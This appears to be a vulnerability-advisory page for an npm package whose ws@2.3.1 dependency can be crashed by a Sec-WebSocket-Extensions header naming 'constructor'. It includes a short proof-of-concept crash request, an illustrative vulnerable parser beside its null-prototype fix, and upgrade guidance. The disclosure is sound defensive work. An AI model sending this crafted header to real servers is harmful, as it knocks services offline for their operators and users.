@splytech-io/splyt-ws-connection@0.2.5

Splyt API connection handler.
Vulnerabilities 1 via 1 paths
Dependencies 78
Source npm


high severity

Denial of Service (DoS)

  • Vulnerable module: ws
  • Introduced through: ws@2.3.1

Detailed paths

  • Introduced through: @splytech-io/splyt-ws-connection@0.2.5 ws@2.3.1
    Remediation: Upgrade to ws@3.3.1.

Overview

ws is a simple-to-use WebSocket client, server and console for Node.js.

Affected versions of the package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that uses Object.prototype property names (for example constructor) as extension or parameter names could be used to make a ws server crash.

PoC:

const WebSocket = require('ws');
const net = require('net');

const wss = new WebSocket.Server({ port: 3000 }, function () {
  const payload = 'constructor';  // or ',;constructor'

  const request = [
    'GET / HTTP/1.1',
    'Connection: Upgrade',
    'Sec-WebSocket-Key: test',
    'Sec-WebSocket-Version: 8',
    `Sec-WebSocket-Extensions: ${payload}`,
    'Upgrade: websocket',
    '\r\n'
  ].join('\r\n');

  const socket = net.connect(3000, function () {
    socket.resume();
    socket.write(request);
  });
});

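The parsing mistake behind this crash, as an added example that is not code from ws or from this package: a constructed, simplified Sec-WebSocket-Extensions parser built on a plain object literal beside the same parser on a null-prototype object, plus a small wrapper that reports whether a parse threw. It covers extension names only; parameter names are the same class of attacker-chosen key and need the same treatment.

```javascript
'use strict';

// Minimal parser for the Sec-WebSocket-Extensions header: a constructed
// illustration, not the parser from ws. Each comma-separated entry is an
// extension name followed by ';'-separated parameters, for example
//   permessage-deflate; client_max_window_bits, x-foo; a=1
function splitEntries(header) {
  return header
    .split(',')
    .map((entry) => {
      const [name, ...params] = entry.split(';').map((s) => s.trim());
      return { name, params };
    })
    .filter((e) => e.name !== '');
}

// Vulnerable shape: a plain object literal inherits Object.prototype, so a
// client-chosen name such as "constructor" or "__proto__" already resolves
// to an inherited value and the `.push` call throws a TypeError.
function parseExtensionsNaive(header) {
  const extensions = {};
  for (const { name, params } of splitEntries(header)) {
    if (extensions[name] === undefined) extensions[name] = [];
    extensions[name].push(params); // TypeError for inherited names
  }
  return extensions;
}

// Hardened shape: a null-prototype object has no inherited keys, so a
// lookup only ever sees names this parser stored itself.
function parseExtensionsSafe(header) {
  const extensions = Object.create(null);
  for (const { name, params } of splitEntries(header)) {
    if (!(name in extensions)) extensions[name] = [];
    extensions[name].push(params);
  }
  return extensions;
}

// Run a parser and report whether it threw. In a server the uncaught
// TypeError is what takes the whole process down.
function tryParse(parser, header) {
  try {
    return { ok: true, value: parser(header) };
  } catch (err) {
    return { ok: false, error: `${err.name}: ${err.message}` };
  }
}
```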

Remediation

Upgrade ws to version 1.1.5, 3.3.1 or higher.
